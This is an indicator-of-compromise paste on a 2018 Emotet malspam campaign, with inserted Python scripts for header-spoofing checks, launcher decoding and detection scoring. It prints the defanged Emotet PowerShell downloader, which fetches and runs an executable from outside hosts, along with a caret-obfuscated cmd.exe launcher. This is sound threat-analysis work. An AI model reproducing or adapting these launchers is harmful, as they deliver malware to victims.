#emolet_011018

VRad Oct 1st, 2018 (edited)
#IOC #OptiData #VR #Emotet #W97M #Macro #powershell

https://pastebin.com/Y6DnbpHv

email_headers
--------------
#1
Received: from a27-50.smtp-out.us-west-2.amazonses{.} com (a27-50.smtp-out.us-west-2.amazonses{.} com [54.240.27.50])
    by mailsrv.victim{.} com (8.15.2/8.15.2) with ESMTP id w918l0k9089312
    for <user1@victim{.} com>; Mon, 1 Oct 2018 11:47:00 +0300 (EEST)
    (envelope-from 010101662ecf0227-5c3272a9-ff0e-4f05-9508-b53355b30f17-000000@us-west-2.amazonses{.} com)
Date: Mon, 1 Oct 2018 08:46:50 +0000
From: Интернет-магазин С торгом <ar@champlungmaslegian{.} com>
To: user1@victim{.} com
Subject: Invoice from Интернет-магазин С торгом

#2
Received-PRA: pass ;
Received-SPF: pass ;
Received: from mail.btconnect{.} com (rdslmr.btconnect{.} com [62.239.164.79]) by mail2.victim2{.} com with smtp id 70c8_00a5_2d799447_045b_463e_aea7_60b44e018a09;
    Mon, 01 Oct 2018 11:46:29 +0300
Received: from mail.btconnect{.} com (rd11780omr12.iuser.iroot.adidom{.} com [10.187.89.173])
    by rd11780slr11.dci.bt{.} com (MOS 4.4.8-GA)
    with ESMTP id AMS19190;
    Mon, 1 Oct 2018 09:46:27 +0100
Received: (from localhost [127.0.0.1])
    by rd11780omr12.dci.bt{.} com (MOS 4.4.8-GA)
    id QYL41356;
    Mon,  1 Oct 2018 09:46:27 +0100 (BST)
Received: from router-heim.i-netpartner.net (EHLO 10.5.21.12) ([217.23.56.98])
    by rd11780omr12.dci.bt{.} com
    with ESMTP id QYL41299 (AUTH parkhillvets@btconnect{.} com);
    Mon, 01 Oct 2018 09:46:26 +0100 (BST)
Date: Mon, 01 Oct 2018 10:46:26 +0100
From: Ващенко Інна <inna@razumkov.org.ua> <parkhillvets@btconnect{.} com>
To: user2@victim2
Subject: Invoice from Ващенко Інна
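
Added check, not part of the paste: the two header sets above run through a small parser that flags what a reviewer looks for here. In #2 the From display name smuggles a second address (inna@razumkov.org.ua) while the real sender is the authenticated BT account, and the "Received-SPF: pass" only vouches for that account, not for the address the user reads. In #1 the From domain differs from the envelope sender (the mail was relayed through Amazon SES). The header text is copied from the paste and refanged; the finding labels, the refang rule and the function names are this example's own.

```python
"""Flag sender-identity mismatches in the two header sets above.

Added example for this paste, not the paste author's tooling. The header text
is copied from the paste (defanged with "{.} "); finding names are ours.
"""
import re

HEADERS_1 = """\
Received: from a27-50.smtp-out.us-west-2.amazonses{.} com (a27-50.smtp-out.us-west-2.amazonses{.} com [54.240.27.50])
    by mailsrv.victim{.} com (8.15.2/8.15.2) with ESMTP id w918l0k9089312
    for <user1@victim{.} com>; Mon, 1 Oct 2018 11:47:00 +0300 (EEST)
    (envelope-from 010101662ecf0227-5c3272a9-ff0e-4f05-9508-b53355b30f17-000000@us-west-2.amazonses{.} com)
Date: Mon, 1 Oct 2018 08:46:50 +0000
From: Интернет-магазин С торгом <ar@champlungmaslegian{.} com>
To: user1@victim{.} com
Subject: Invoice from Интернет-магазин С торгом
"""

HEADERS_2 = """\
Received-PRA: pass ;
Received-SPF: pass ;
Received: from mail.btconnect{.} com (rdslmr.btconnect{.} com [62.239.164.79]) by mail2.victim2{.} com with smtp id 70c8_00a5_2d799447_045b_463e_aea7_60b44e018a09;
    Mon, 01 Oct 2018 11:46:29 +0300
Received: from router-heim.i-netpartner.net (EHLO 10.5.21.12) ([217.23.56.98])
    by rd11780omr12.dci.bt{.} com
    with ESMTP id QYL41299 (AUTH parkhillvets@btconnect{.} com);
    Mon, 01 Oct 2018 09:46:26 +0100 (BST)
Date: Mon, 01 Oct 2018 10:46:26 +0100
From: Ващенко Інна <inna@razumkov.org.ua> <parkhillvets@btconnect{.} com>
To: user2@victim2
Subject: Invoice from Ващенко Інна
"""

ADDR_RE = re.compile(r"<([^<>\s]+@[^<>\s]+)>")
ENVELOPE_RE = re.compile(r"envelope-from\s+<?([^\s<>()]+@[^\s<>()]+)", re.I)
AUTH_RE = re.compile(r"\(AUTH\s+([^\s)]+)\)", re.I)


def refang(text: str) -> str:
    """Undo the paste's "{.} " defanging so addresses parse."""
    return text.replace("{.} ", ".")


def unfold_headers(raw: str) -> list[tuple[str, str]]:
    """Join RFC 5322 folded continuation lines back onto their header; names lowercased."""
    fields: list[tuple[str, str]] = []
    for line in raw.splitlines():
        if not line.strip():
            continue
        if line[0] in " \t" and fields:
            name, value = fields[-1]
            fields[-1] = (name, value + " " + line.strip())
        else:
            name, _, value = line.partition(":")
            fields.append((name.strip().lower(), value.strip()))
    return fields


def values(fields, name):
    return [v for n, v in fields if n == name.lower()]


def domain(addr: str) -> str:
    return addr.rsplit("@", 1)[-1].lower()


def sender_findings(raw_headers: str) -> list[str]:
    """Return anomaly labels comparing the displayed From with envelope/auth identities."""
    fields = unfold_headers(refang(raw_headers))
    findings = []
    frm = values(fields, "From")[0]
    addrs = ADDR_RE.findall(frm)
    real = addrs[-1]  # the last <...> is the address the message is really from
    # A display name carrying its own <address>: the recipient sees the first one.
    for decoy in addrs[:-1]:
        if decoy.lower() != real.lower():
            findings.append(f"display_name_contains_other_address:{decoy}!={real}")
    received = " ".join(values(fields, "Received"))
    env = ENVELOPE_RE.search(received)
    if env and domain(env.group(1)) != domain(real):
        findings.append(f"envelope_from_domain_differs:{domain(env.group(1))}!={domain(real)}")
    auth = AUTH_RE.search(received)
    if auth and domain(auth.group(1)) != domain(real):
        findings.append(f"smtp_auth_domain_differs:{domain(auth.group(1))}!={domain(real)}")
    # Received-SPF is evaluated against the envelope / authenticated sender, so a
    # "pass" says nothing about the identity the user actually reads.
    if any(v.lower().startswith("pass") for v in values(fields, "Received-SPF")) and findings:
        findings.append("spf_pass_does_not_cover_displayed_sender")
    return findings
```

Run sender_findings(HEADERS_1) and sender_findings(HEADERS_2) to see the two different deception patterns; the BT account in #2 is the one SPF and the AUTH line vouch for, which is why the check compares the display-name address against the last angle-bracket address rather than trusting the SPF verdict.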

files
--------------
SHA-256 84803f2f3f575a5cb48fd7eabd9b0e8e73776b2fd8f3b3e098c8709d282c7fd7
File name   FILE_58873.doc
File size   66.63 KB

SHA-256 fe516708fe6db062b525795e67100e846257135e5a30526839ed405bf05ed4a5
File name   U5CUyRF7hzz.exe
File size   184 KB

h11p: \gidamikrobiyoloji{.} com/IBfAlRX
h11p: \madisonda{.} com/BacOqsvFqz
h11p: \motiondev{.} com{.} br/1cTvBSu2P
h11p: \fluorescent{.} cc/KxcY1d6R
h11p: \kristianmarlow{.} com/Sy5IRFsRU9

powershell $Knq=new-object Net.WebClient;$ibh='h11p: \gidamikrobiyoloji{.} com/IBfAlRX@h11p: \madisonda{.} com/BacOqsvFqz@h11p: \motiondev{.} com{.} br/1cTvBSu2P@h11p: \fluorescent{.} cc/KxcY1d6R@h11p: \kristianmarlow{.} com/Sy5IRFsRU9'.Split('@');$tFI = '992';$KMF=$env:public+'\'+$tFI+'.exe';foreach($HAE in $ibh){try{$Knq.DownloadFile($HAE, $KMF);Invoke-Item $KMF;break;}catch{}}

activity
**************

proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
C:\Windows\SysWOW64\CMd.exe  /V/C"^s^e^t ^B^J^1=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}{^hc^t^ac}^;^k^a^er^b^;^F^M^K^$^ ^m^e^t^I-^e^k^ovn^I^;)^F^M^K^$^ ,E^A^H^$(^e^l^i^F^d^a^o^ln^w^o^D^.^qn^K^$^{^yrt^{)h^b^i^$^ n^i^ ^E^A^H^$(^hc^a^er^of^;^'^e^x^e^.^......
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  $Knq=new-object Net.WebClient;$ibh='h11p: \gidamikrobiyoloji{.} com/IBfAlRX@h11p: \madisonda{.} com/BacOqsvFqz@h11p: \motiondev{.} com{.} br/1cTvBSu2P@h11p: \fluorescent{.} cc/KxcY1d6R@h11p: \kristianmarlow{.} com/Sy5IRFsRU9'.Split('@');$tFI = '992';$KMF=$env:public+'\'+$tFI+'.exe';foreach($HAE in $ibh){try{$Knq.DownloadFile($HAE, $KMF);Invoke-Item $KMF;break;}catch{}}
"C:\Users\Public\992.exe"
"C:\Users\operator\AppData\Local\Microsoft\Windows\xpathcab.exe"

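The cmd.exe line above is the 2018 Emotet launcher pattern: /V turns on delayed expansion, ^ escapes split every keyword so string matching on "set" or "powershell" fails, and the variable holds the PowerShell stage written backwards (the remainder, which the paste truncates with "......", is presumably the loop that reads it back). As an added example, not the paste author's tooling, the script below strips the carets, reverses the set value and confirms that the visible tail is the end of the PowerShell one-liner from the files section; it then pulls the URL list, the drop path and the launch cmdlet out of that one-liner. Both inputs are copied from the paste; the refang rules and function names are this example's own, and C:\Users\Public as the value of $env:public is an assumption.

```python
"""Decode the caret-escaped cmd.exe launcher and extract IOCs from the
PowerShell stage. Added example for this paste, not the paste author's code.
"""
import re
from typing import Optional

# Visible part of the cmd.exe command line, copied from the paste (it ends
# where the paste truncates with "......").
CMD_FRAGMENT = (
    "C:\\Windows\\SysWOW64\\CMd.exe  /V/C\"^s^e^t ^B^J^1=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}{^hc^t^ac}"
    "^;^k^a^er^b^;^F^M^K^$^ ^m^e^t^I-^e^k^ovn^I^;)^F^M^K^$^ ,E^A^H^$(^e^l^i^F^d^a^o^ln^w^o^D^.^qn^K^$^{^yrt^{"
    ")h^b^i^$^ n^i^ ^E^A^H^$(^hc^a^er^of^;^'^e^x^e^.^......"
)

# The PowerShell stage as it appeared on the command line (defanged as in the paste).
PS_STAGE = (
    "$Knq=new-object Net.WebClient;"
    "$ibh='h11p: \\gidamikrobiyoloji{.} com/IBfAlRX@h11p: \\madisonda{.} com/BacOqsvFqz@"
    "h11p: \\motiondev{.} com{.} br/1cTvBSu2P@h11p: \\fluorescent{.} cc/KxcY1d6R@"
    "h11p: \\kristianmarlow{.} com/Sy5IRFsRU9'.Split('@');$tFI = '992';"
    "$KMF=$env:public+'\\'+$tFI+'.exe';"
    "foreach($HAE in $ibh){try{$Knq.DownloadFile($HAE, $KMF);Invoke-Item $KMF;break;}catch{}}"
)


def strip_carets(cmdline: str) -> str:
    """cmd.exe drops a ^ and takes the next character literally (so ^^ -> ^)."""
    return re.sub(r"\^(.)", r"\1", cmdline, flags=re.S)


def decode_reversed_set(cmdline: str) -> str:
    """Recover the payload stored backwards in `set VAR=<text>`.

    The loader pads the value with spaces, so strip before reversing.
    """
    plain = strip_carets(cmdline)
    m = re.search(r"\bset\s+(\w+)=([^&]*)", plain, flags=re.I | re.S)
    if not m:
        raise ValueError("no set VAR=... assignment found")
    return m.group(2).strip()[::-1]


DEFANG_RULES = [("h11ps: \\", "https://"), ("h11p: \\", "http://"), ("{.} ", ".")]


def refang(url: str) -> str:
    """Undo the paste's defanging (our rule set, matching the notation used above)."""
    for old, new in DEFANG_RULES:
        url = url.replace(old, new)
    return url


def download_urls(ps: str) -> list[str]:
    """Pull the '@'-joined list out of  $var='a@b@c'.Split('@')  and refang it."""
    m = re.search(r"'([^']*)'\.Split\('@'\)", ps)
    return [refang(u) for u in m.group(1).split("@")] if m else []


def drop_path(ps: str, public: str = "C:\\Users\\Public") -> str:
    """Resolve $env:public+'\\'+$var+'.ext' using the literal assigned to $var.

    `public` is an assumption for a default Windows install.
    """
    m = re.search(r"\$env:public\+'\\'\+\$(\w+)\+'(\.\w+)'", ps)
    if not m:
        raise ValueError("no $env:public drop-path expression found")
    var, ext = m.groups()
    lit = re.search(r"\$" + re.escape(var) + r"\s*=\s*'([^']*)'", ps)
    if not lit:
        raise ValueError(f"${var} is not assigned a string literal")
    return f"{public}\\{lit.group(1)}{ext}"


def launch_verb(ps: str) -> Optional[str]:
    """Which cmdlet runs the dropped file (Invoke-Item here; Start-Process in other builds)."""
    m = re.search(r"\b(Invoke-Item|Start-Process|saps|iex)\b", ps, flags=re.I)
    return m.group(1) if m else None


if __name__ == "__main__":
    tail = decode_reversed_set(CMD_FRAGMENT)
    print("decoded cmd stage tail:", tail)
    print("matches PowerShell stage:", PS_STAGE.endswith(tail.lstrip(".")))
    for u in download_urls(PS_STAGE):
        print("payload url:", u)
    print("drop path:", drop_path(PS_STAGE), "launched via", launch_verb(PS_STAGE))
```

The caret stripper uses a regex rather than a plain replace so that a doubled ^^ survives as one literal caret, which is how cmd.exe treats it; the leading dots in the decoded tail are the paste's own truncation marker reversed and are stripped before comparing with the PowerShell stage.
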
netwrk
--------------
185.179.26.24   gidamikrobiyoloji{.} com    GET /IBfAlRX/ HTTP/1.1  no User Agent
"190.2.50.193","190.2.50.193:443","GET / HTTP/1.1 ","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64;

comp
--------------
powershell.exe  1556    185.179.26.24   80      ESTABLISHED
xpathcab.exe    3720    190.215.241.14  8080    SYN_SENT
xpathcab.exe    3720    190.2.50.193    443     SYN_SENT

persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run              01.10.2018 14:22
xpathcab            c:\users\operator\appdata\local\microsoft\windows\xpathcab.exe  01.10.2018 13:00
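
Pulling the proc, netwrk, comp and persist observations together, as an added example that is not the paste author's tooling: constructed telemetry mirroring those sections is scored against the rules a detection engineer would write from this chain (Office spawning a shell, a caret-dense cmd.exe line with /V, PowerShell that builds a WebClient and runs what it downloaded, binaries executing from Public or AppData, an HTTP request with no User-Agent, which is what WebClient.DownloadFile sends by default, a dropped binary connecting to 8080, and a Run value pointing at that binary). Parent/child links, PIDs other than 1556 and 3720, and the benign control process are assumptions; the rule names are ours.

```python
"""Score endpoint telemetry against the Emotet chain recorded above.

Added example, not the paste author's tooling. The events are constructed to
mirror the proc / netwrk / comp / persist sections; parent-child links and the
PIDs other than 1556 and 3720 are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    parent: str      # parent image name (assumed from the paste's ordering)
    image: str
    cmdline: str


@dataclass
class Conn:
    image: str
    pid: int
    dst: str
    port: int
    state: str
    user_agent: str = ""   # "" = request carried no User-Agent header


@dataclass
class RunValue:
    key: str
    name: str
    path: str


PROCS = [
    Proc(1000, "explorer.exe", "WINWORD.EXE",
         r'"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde'),
    Proc(1001, "WINWORD.EXE", "cmd.exe",            # caret stage, truncated here
         r'C:\Windows\SysWOW64\CMd.exe /V/C"^s^e^t ^B^J^1=^ ^ ^}^}{^hc^t^ac}^;^k^a^er^b^;^F^M^K^$^ ^m^e^t^I-^e^k^ovn^I^;..."'),
    Proc(1556, "cmd.exe", "powershell.exe",         # downloader stage, truncated here
         r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $Knq=new-object Net.WebClient;...$Knq.DownloadFile($HAE, $KMF);Invoke-Item $KMF;break;}catch{}}"),
    Proc(1002, "powershell.exe", "992.exe", r'"C:\Users\Public\992.exe"'),
    Proc(3720, "992.exe", "xpathcab.exe",
         r'"C:\Users\operator\AppData\Local\Microsoft\Windows\xpathcab.exe"'),
    Proc(1003, "explorer.exe", "cmd.exe", r"C:\Windows\System32\cmd.exe /c dir"),  # benign control (constructed)
]
CONNS = [
    Conn("powershell.exe", 1556, "185.179.26.24", 80, "ESTABLISHED"),
    Conn("xpathcab.exe", 3720, "190.215.241.14", 8080, "SYN_SENT"),
    Conn("xpathcab.exe", 3720, "190.2.50.193", 443, "SYN_SENT",
         user_agent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64;"),
]
RUN_VALUES = [
    RunValue(r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "xpathcab",
             r"c:\users\operator\appdata\local\microsoft\windows\xpathcab.exe"),
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Public, or the user's AppData\Local\Microsoft\Windows: where this chain drops binaries.
USER_WRITABLE = re.compile(
    r"^c:\\users\\(public|[^\\]+\\appdata\\local\\microsoft\\windows)\\[^\\]+\.exe$", re.I)
DOWNLOAD_RUN = re.compile(r"Net\.WebClient.*DownloadFile.*(Invoke-Item|Start-Process)", re.I | re.S)


def caret_density(cmdline: str) -> float:
    """Share of ^ characters; legitimate command lines sit near zero."""
    return cmdline.count("^") / max(len(cmdline), 1)


def score(procs, conns, run_values):
    """Return (rule, subject) pairs; subject is a PID or a Run value name."""
    hits, dropped = [], set()
    for p in procs:
        img, parent = p.image.lower(), p.parent.lower()
        if parent in OFFICE and img in SHELLS:
            hits.append(("office_spawns_shell", p.pid))
        if img == "cmd.exe" and "/v" in p.cmdline.lower() and caret_density(p.cmdline) > 0.1:
            hits.append(("caret_obfuscated_cmd", p.pid))
        if img == "powershell.exe" and DOWNLOAD_RUN.search(p.cmdline):
            hits.append(("powershell_download_and_run", p.pid))
        if USER_WRITABLE.search(p.cmdline.strip('"')):
            hits.append(("exec_from_user_writable", p.pid))
            dropped.add(img)
    for c in conns:
        if c.port == 80 and not c.user_agent and c.image.lower() in SHELLS:
            hits.append(("http_without_user_agent", c.pid))
        if c.image.lower() in dropped and c.port not in (80, 443):
            hits.append(("nonstandard_port_from_dropped_binary", c.pid))
    for r in run_values:
        if USER_WRITABLE.search(r.path) and r.path.rsplit("\\", 1)[-1].lower() in dropped:
            hits.append(("run_key_points_to_dropped_binary", r.name))
    return hits


if __name__ == "__main__":
    for rule, subject in score(PROCS, CONNS, RUN_VALUES):
        print(f"{rule:40} {subject}")
```

Each rule on its own is noisy in a large estate; the value is that one host trips all seven within minutes, and the Run value ties the persistence back to the binary the PowerShell stage dropped, so the process, network and registry evidence can be correlated on the image name.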

# # #